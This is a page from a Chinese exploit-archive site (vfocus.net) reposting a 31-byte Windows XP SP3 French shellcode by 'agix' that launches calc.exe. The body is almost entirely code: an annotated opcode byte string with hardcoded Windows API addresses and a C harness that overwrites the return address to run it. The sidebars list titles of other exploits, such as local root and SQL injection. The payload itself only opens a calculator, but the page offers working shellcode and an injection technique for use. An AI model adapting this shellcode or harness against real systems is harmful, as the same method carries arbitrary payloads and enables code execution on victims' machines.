首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
win32/xp sp3 Fr (calc.exe) Shellcode 31 Bytes
来源:vfocus.net 作者:agix 发布时间:2010-05-19  
=============================================
win32/xp sp3 Fr (calc.exe) Shellcode 31 Bytes
=============================================


 /*
 | Title: Windows Xp Pro SP3 Fr (calc.exe) Shellcode 31 Bytes
 | Type: Shellcode
 | Author: agix
 | Platform: win32
*/

#include <stdio.h>

char shellcode[] =
"\xEB\x10" //jmp short 0x12
"\x5B" //pop ebx
"\x53" //push ebx
"\xBB\xAD\x23\x86\x7C" //mov ebx, 0x7c8623ad
"\xFF\xD3" //call ebx
"\xBB\xFA\xCA\x81\x7C" //mov ebx, 0x7c81cafa
"\xFF\xD3" //call ebx
"\xE8\xEB\xFF\xFF\xFF" //call dword 0x2
//db calc.exe
"\x63\x61\x6C\x63\x2E\x65\x78\x65";

int main(int argc, char **argv) {
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int) shellcode;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpcms2008第二个EXP
·Reflection Attachmate Reflecti
·phpcms 2008 yp.php 0day exp
·ChillyCMS Blind Sql Injection
·Linux x86 execve("/usr/bin/wge
·TeamViewer 5.0.8232 Remote BOF
·ECShop <= v2.7.2 SQL injection
·NetBSD 5.0 and below Hack GENO
·ECShop <= v2.6.2 SQL injection
·NetBSD 5.0 and below Hack PATH
·支持serv-u7,8,9本地提权exp
·QtWeb Browser version 3.3 Dos
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved